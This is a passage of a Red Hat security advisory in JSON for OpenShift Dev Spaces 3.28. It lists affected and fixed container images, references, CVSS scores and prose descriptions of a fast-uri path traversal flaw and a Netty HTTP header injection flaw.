"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-6321"
},
{
"category": "external",
"summary": "RHBZ#2466582",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466582"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-6321",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-6321"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-6321",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6321"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6",
"url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6"
}
],
"release_date": "2026-05-04T19:31:57.253000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T19:42:14+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-uri: fast-uri: Path traversal vulnerability allows bypass of security policies"
},
{
"cve": "CVE-2026-42578",
"cwe": {
"id": "CWE-93",
"name": "Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)"
},
"discovery_date": "2026-05-13T19:02:00.826936+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477226"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. The HttpProxyHandler component, which handles HTTP CONNECT requests, does not properly validate user-provided outbound headers. This allows an attacker to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This could lead to unexpected behavior or potential bypass of security controls on the proxy server.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
